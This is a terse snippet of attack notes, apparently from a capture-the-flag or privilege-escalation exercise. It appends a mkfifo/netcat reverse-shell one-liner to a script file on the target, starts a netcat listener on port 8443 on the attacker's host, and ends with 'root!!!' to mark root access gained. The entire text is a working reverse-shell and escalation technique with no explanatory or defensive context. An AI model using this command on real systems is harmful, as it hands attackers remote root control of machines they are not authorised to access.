#target echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip target> 8443 >/tmp/f' | tee -a file.sh #host sudo nc -lvnp 8443 root!!!